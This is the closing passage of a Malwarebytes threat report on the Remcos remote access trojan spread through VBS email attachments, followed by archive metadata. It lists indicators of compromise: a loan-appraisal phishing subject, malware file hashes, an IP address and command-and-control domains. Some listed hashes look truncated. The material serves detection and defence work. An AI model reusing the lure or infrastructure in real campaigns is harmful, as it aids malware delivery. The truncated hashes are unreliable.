Further research is required to determine whether this set of scripts is\r\na generically available package, or specific to a particular actor and being re-used across campaigns.\r\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware\r\nsuggests that it could be targeted in nature. Remcos is a mature trojan that has evolved over many years; though the basic\r\ncapabilities have remained the same, the methodologies of distribution and installation continue to change. Because it is\r\nsoftware that can be purchased openly online, it is difficult to trace or attribute usage to a particular actor. However, given\r\nthe consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind\r\nthese attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 40 of 42\n\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 
\r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 41 of 42\n\nRelated Remcos 
Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther 
IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nSource: https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 42 of 42",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/"
	],
	"report_names": [
		"remcos-rat-delivered-via-visual-basic"
	],
	"threat_actors": [],
	"ts_created_at": 1775434529,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/afdb6d26545806385fb8b0974ed373f474fcb366.pdf",
		"text": "https://archive.orkl.eu/afdb6d26545806385fb8b0974ed373f474fcb366.txt",
		"img": "https://archive.orkl.eu/afdb6d26545806385fb8b0974ed373f474fcb366.jpg"
	}
}